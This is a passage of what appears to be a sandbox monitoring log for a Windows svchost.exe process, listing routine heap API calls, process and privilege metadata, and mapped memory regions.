[0371.909] GetProcessHeap () returned 0x60000
[0371.909] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c0c0) returned 0x18
[0371.909] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c0c0 | out: hHeap=0x60000) returned 1
[0371.909] GetProcessHeap () returned 0x60000
[0371.909] GetProcessHeap () returned 0x60000
[0371.909] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75b20) returned 1
[0371.909] GetProcessHeap () returned 0x60000
[0371.910] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75b20) returned 0x20
[0371.910] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75b20 | out: hHeap=0x60000) returned 1
[0371.910] GetProcessHeap () returned 0x60000
[0371.910] GetProcessHeap () returned 0x60000
[0371.910] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x95f70) returned 1
[0371.910] GetProcessHeap () returned 0x60000
[0371.910] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x95f70) returned 0x5a
[0371.911] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x95f70 | out: hHeap=0x60000) returned 1
[0371.911] GetProcessHeap () returned 0x60000
[0371.911] GetProcessHeap () returned 0x60000
[0371.911] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75970) returned 1
[0371.911] GetProcessHeap () returned 0x60000
[0371.911] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75970) returned 0x20
[0371.911] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75970 | out: hHeap=0x60000) returned 1
[0371.911] GetProcessHeap () returned 0x60000
[0371.911] GetProcessHeap () returned 0x60000
[0371.912] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x759a0) returned 1
[0371.912] GetProcessHeap () returned 0x60000
[0371.912] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x759a0) returned 0x20
[0371.912] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x759a0 | out: hHeap=0x60000) returned 1
[0371.912] GetProcessHeap () returned 0x60000
[0371.912] GetProcessHeap () returned 0x60000
[0371.912] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x759d0) returned 1
[0371.912] GetProcessHeap () returned 0x60000
[0371.912] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x759d0) returned 0x20
[0371.913] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x759d0 | out: hHeap=0x60000) returned 1
[0371.913] GetProcessHeap () returned 0x60000
[0371.913] GetProcessHeap () returned 0x60000
[0371.913] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75a00) returned 1
[0371.913] GetProcessHeap () returned 0x60000
[0371.913] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75a00) returned 0x20
[0371.913] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75a00 | out: hHeap=0x60000) returned 1
[0371.913] GetProcessHeap () returned 0x60000
[0371.914] GetProcessHeap () returned 0x60000
[0371.914] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cbb0) returned 1
[0371.914] GetProcessHeap () returned 0x60000
[0371.914] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cbb0) returned 0x20
[0371.914] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cbb0 | out: hHeap=0x60000) returned 1
[0371.914] GetProcessHeap () returned 0x60000
[0371.914] GetProcessHeap () returned 0x60000
[0371.914] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cbe0) returned 1
[0371.914] GetProcessHeap () returned 0x60000
[0371.914] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cbe0) returned 0x20
[0371.915] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cbe0 | out: hHeap=0x60000) returned 1
[0371.915] GetProcessHeap () returned 0x60000
[0371.915] GetProcessHeap () returned 0x60000
[0371.915] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x77bd0) returned 1
[0371.915] GetProcessHeap () returned 0x60000
[0371.915] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x77bd0) returned 0x30
[0371.915] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x77bd0 | out: hHeap=0x60000) returned 1
[0371.916] GetProcessHeap () returned 0x60000
[0371.916] GetProcessHeap () returned 0x60000
[0371.916] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cc10) returned 1
[0371.916] GetProcessHeap () returned 0x60000
[0371.916] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cc10) returned 0x20
[0371.917] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cc10 | out: hHeap=0x60000) returned 1
[0371.917] GetProcessHeap () returned 0x60000
[0371.917] GetProcessHeap () returned 0x60000
[0371.917] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x77c10) returned 1
[0371.917] GetProcessHeap () returned 0x60000
[0371.917] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x77c10) returned 0x30
[0371.917] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x77c10 | out: hHeap=0x60000) returned 1
[0371.917] GetProcessHeap () returned 0x60000
[0371.917] GetProcessHeap () returned 0x60000
[0371.917] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cc70) returned 1
[0371.918] GetProcessHeap () returned 0x60000
[0371.918] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cc70) returned 0x20
[0371.918] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cc70 | out: hHeap=0x60000) returned 1
[0371.918] GetProcessHeap () returned 0x60000
[0371.918] GetProcessHeap () returned 0x60000
[0371.918] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x81210) returned 1
[0371.918] GetProcessHeap () returned 0x60000
[0371.918] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x81210) returned 0xe
[0371.918] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x81210 | out: hHeap=0x60000) returned 1
[0371.919] GetProcessHeap () returned 0x60000
[0371.919] GetProcessHeap () returned 0x60000
[0371.919] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x93810) returned 1
[0371.919] GetProcessHeap () returned 0x60000
[0371.919] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x93810) returned 0x20
[0371.919] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x93810 | out: hHeap=0x60000) returned 1
[0371.919] GetProcessHeap () returned 0x60000
[0371.919] GetProcessHeap () returned 0x60000
[0371.919] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba10) returned 1
[0371.919] GetProcessHeap () returned 0x60000
[0371.919] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7ba10) returned 0x18
[0371.919] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba10 | out: hHeap=0x60000) returned 1
[0371.920] GetProcessHeap () returned 0x60000
[0371.920] GetProcessHeap () returned 0x60000
[0371.920] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75a30) returned 1
[0371.920] GetProcessHeap () returned 0x60000
[0371.920] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75a30) returned 0x20
[0371.920] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75a30 | out: hHeap=0x60000) returned 1
[0371.920] GetProcessHeap () returned 0x60000
[0371.920] GetProcessHeap () returned 0x60000
[0371.920] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75a60) returned 1
[0371.920] GetProcessHeap () returned 0x60000
[0371.921] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75a60) returned 0x20
[0371.921] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75a60 | out: hHeap=0x60000) returned 1
[0371.921] GetProcessHeap () returned 0x60000
[0371.921] GetProcessHeap () returned 0x60000
[0371.921] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75a90) returned 1
[0371.921] GetProcessHeap () returned 0x60000
[0371.921] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75a90) returned 0x20
[0371.921] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75a90 | out: hHeap=0x60000) returned 1
[0371.922] GetProcessHeap () returned 0x60000
[0371.922] GetProcessHeap () returned 0x60000
[0371.922] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75ac0) returned 1
[0371.922] GetProcessHeap () returned 0x60000
[0371.922] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75ac0) returned 0x20
[0371.922] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75ac0 | out: hHeap=0x60000) returned 1
[0371.922] GetProcessHeap () returned 0x60000
[0371.922] GetProcessHeap () returned 0x60000
[0371.922] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba30) returned 1
[0371.922] GetProcessHeap () returned 0x60000
[0371.922] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7ba30) returned 0x18
[0371.923] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba30 | out: hHeap=0x60000) returned 1
[0371.923] GetProcessHeap () returned 0x60000
[0371.923] GetProcessHeap () returned 0x60000
[0371.923] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75af0) returned 1
[0371.923] GetProcessHeap () returned 0x60000
[0371.923] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75af0) returned 0x20
[0371.923] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75af0 | out: hHeap=0x60000) returned 1
[0371.923] GetProcessHeap () returned 0x60000
[0371.923] GetProcessHeap () returned 0x60000
[0371.924] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75b80) returned 1
[0371.924] GetProcessHeap () returned 0x60000
[0371.924] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75b80) returned 0x20
[0371.924] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75b80 | out: hHeap=0x60000) returned 1
[0371.924] GetProcessHeap () returned 0x60000
[0371.924] GetProcessHeap () returned 0x60000
[0371.924] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75c40) returned 1
[0371.924] GetProcessHeap () returned 0x60000
[0371.924] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75c40) returned 0x20
[0371.925] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75c40 | out: hHeap=0x60000) returned 1
[0371.925] GetProcessHeap () returned 0x60000
[0371.925] GetProcessHeap () returned 0x60000
[0371.925] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75c70) returned 1
[0371.925] GetProcessHeap () returned 0x60000
[0371.925] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75c70) returned 0x20
[0371.925] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75c70 | out: hHeap=0x60000) returned 1
[0371.925] GetProcessHeap () returned 0x60000
[0371.926] GetProcessHeap () returned 0x60000
[0371.926] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7caf0) returned 1
[0371.926] GetProcessHeap () returned 0x60000
[0371.926] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7caf0) returned 0x20
[0371.926] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7caf0 | out: hHeap=0x60000) returned 1
[0371.926] GetProcessHeap () returned 0x60000
[0371.926] GetProcessHeap () returned 0x60000
[0371.926] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cb20) returned 1
[0371.926] GetProcessHeap () returned 0x60000
[0371.926] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cb20) returned 0x20
[0371.927] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cb20 | out: hHeap=0x60000) returned 1
[0371.927] GetProcessHeap () returned 0x60000
[0371.927] GetProcessHeap () returned 0x60000
[0371.927] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cb50) returned 1
[0371.927] GetProcessHeap () returned 0x60000
[0371.927] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cb50) returned 0x20
[0371.927] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cb50 | out: hHeap=0x60000) returned 1
[0371.927] GetProcessHeap () returned 0x60000
[0371.928] GetProcessHeap () returned 0x60000
[0371.928] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba50) returned 1
[0371.928] GetProcessHeap () returned 0x60000
[0371.928] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7ba50) returned 0x18
[0371.928] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7ba50 | out: hHeap=0x60000) returned 1
[0371.928] GetProcessHeap () returned 0x60000
[0371.928] GetProcessHeap () returned 0x60000
[0371.928] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x75bb0) returned 1
[0371.928] GetProcessHeap () returned 0x60000
[0371.928] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x75bb0) returned 0x20
[0371.929] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x75bb0 | out: hHeap=0x60000) returned 1
[0371.929] GetProcessHeap () returned 0x60000
[0371.929] GetProcessHeap () returned 0x60000
[0371.929] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7b9d0) returned 1
[0371.929] GetProcessHeap () returned 0x60000
[0371.929] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7b9d0) returned 0x18
[0371.929] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7b9d0 | out: hHeap=0x60000) returned 1
[0371.929] exit (_Code=1)
Thread:
id = 82
os_tid = 0x51c
Process:
id = "5"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x71b4000"
os_pid = "0x36c"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "rpc_server"
parent_id = "3"
os_parent_pid = "0x1d8"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000da1c" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 1213
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1214
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 1215
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1216
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1217
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1218
start_va = 0xc0000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 1219
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1220
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1221
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 1222
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 1223
start_va = 0x200000
end_va = 0x200fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000200000"
filename = ""
Region:
id = 1224
start_va = 0x210000
end_va = 0x28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 1225
start_va = 0x290000
end_va = 0x34ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000290000"
filename = ""
Region:
id = 1226
start_va = 0x350000
end_va = 0x35afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gpsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui")
Region:
id = 1227
start_va = 0x360000
end_va = 0x36cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 1228
start_va = 0x370000
end_va = 0x373fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taskcomp.dll.mui"
filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui")
Region:
id = 1229
start_va = 0x380000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000380000"
filename = ""
Region:
id = 1230
start_va = 0x480000
end_va = 0x607fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000480000"
filename = ""
Region:
id = 1231
start_va = 0x610000
end_va = 0x619fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schedsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui")
Region:
id = 1232
start_va = 0x620000
end_va = 0x620fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000620000"
filename = ""
Region:
id = 1233
start_va = 0x630000
end_va = 0x631fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000630000"
filename = ""
Region:
id = 1234
start_va = 0x640000
end_va = 0x643fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1235
start_va = 0x650000
end_va = 0x65ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000650000"
filename = ""
Region:
id = 1236
start_va = 0x660000
end_va = 0x7e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000660000"
filename = ""
Region:
id = 1237
start_va = 0x7f0000
end_va = 0x7f1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007f0000"
filename = ""
Region:
id = 1238
start_va = 0x800000
end_va = 0x82ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db")
Region:
id = 1239
start_va = 0x830000
end_va = 0x8affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000830000"
filename = ""
Region:
id = 1240
start_va = 0x930000
end_va = 0x9affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 1241
start_va = 0x9b0000
end_va = 0x9b3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1242
start_va = 0x9c0000
end_va = 0x9cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 1243
start_va = 0x9d0000
end_va = 0x9d7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vsstrace.dll.mui"
filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui")
Region:
id = 1244
start_va = 0x9e0000
end_va = 0x9e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000009e0000"
filename = ""
Region:
id = 1245
start_va = 0xa70000
end_va = 0xa8bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "firewallapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui")
Region:
id = 1246
start_va = 0xa90000
end_va = 0xa90fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a90000"
filename = ""
Region:
id = 1247
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000aa0000"
filename = ""
Region:
id = 1248
start_va = 0xab0000
end_va = 0xab0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wshtcpip.dll.mui"
filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui")
Region:
id = 1249
start_va = 0xb50000
end_va = 0xb53fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b50000"
filename = ""
Region:
id = 1250
start_va = 0xb60000
end_va = 0xb79fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b60000"
filename = ""
Region:
id = 1251
start_va = 0xb90000
end_va = 0xb97fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b90000"
filename = ""
Region:
id = 1252
start_va = 0xbc0000
end_va = 0xbc0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wship6.dll.mui"
filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui")
Region:
id = 1253
start_va = 0xbd0000
end_va = 0xbd0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000bd0000"
filename = ""
Region:
id = 1254
start_va = 0xc60000
end_va = 0xc60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c60000"
filename = ""
Region:
id = 1255
start_va = 0xc70000
end_va = 0xf3efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1256
start_va = 0x1010000
end_va = 0x108ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001010000"
filename = ""
Region:
id = 1257
start_va = 0x1090000
end_va = 0x110ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001090000"
filename = ""
Region:
id = 1258
start_va = 0x1110000
end_va = 0x111ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001110000"
filename = ""
Region:
id = 1259
start_va = 0x1160000
end_va = 0x11dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001160000"
filename = ""
Region:
id = 1260
start_va = 0x1230000
end_va = 0x12affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001230000"
filename = ""
Region:
id = 1261
start_va = 0x12c0000
end_va = 0x133ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012c0000"
filename = ""
Region:
id = 1262
start_va = 0x1340000
end_va = 0x13bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001340000"
filename = ""
Region:
id = 1263
start_va = 0x1440000
end_va = 0x14a5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 1264
start_va = 0x1500000
end_va = 0x157ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001500000"
filename = ""
Region:
id = 1265
start_va = 0x15e0000
end_va = 0x15effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000015e0000"
filename = ""
Region:
id = 1266
start_va = 0x15f0000
end_va = 0x166ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000015f0000"
filename = ""
Region:
id = 1267
start_va = 0x16a0000
end_va = 0x171ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000016a0000"
filename = ""
Region:
id = 1268
start_va = 0x1740000
end_va = 0x1742fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wuaueng.dll.mui"
filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui")
Region:
id = 1269
start_va = 0x1750000
end_va = 0x17cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001750000"
filename = ""
Region:
id = 1270
start_va = 0x17d0000
end_va = 0x184ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000017d0000"
filename = ""
Region:
id = 1271
start_va = 0x1860000
end_va = 0x18dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001860000"
filename = ""
Region:
id = 1272
start_va = 0x18e0000
end_va = 0x18e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000018e0000"
filename = ""
Region:
id = 1273
start_va = 0x1930000
end_va = 0x19affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001930000"
filename = ""
Region:
id = 1274
start_va = 0x19d0000
end_va = 0x1a4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000019d0000"
filename = ""
Region:
id = 1275
start_va = 0x1a60000
end_va = 0x1adffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a60000"
filename = ""
Region:
id = 1276
start_va = 0x1ae0000
end_va = 0x1bdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ae0000"
filename = ""
Region:
id = 1277
start_va = 0x1be0000
end_va = 0x1cdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001be0000"
filename = ""
Region:
id = 1278
start_va = 0x1d10000
end_va = 0x1d8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d10000"
filename = ""
Region:
id = 1279
start_va = 0x1db0000
end_va = 0x1e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001db0000"
filename = ""
Region:
id = 1280
start_va = 0x1f00000
end_va = 0x1f7ffff
monitored = 1
entry_point = 0x0
region_type = private
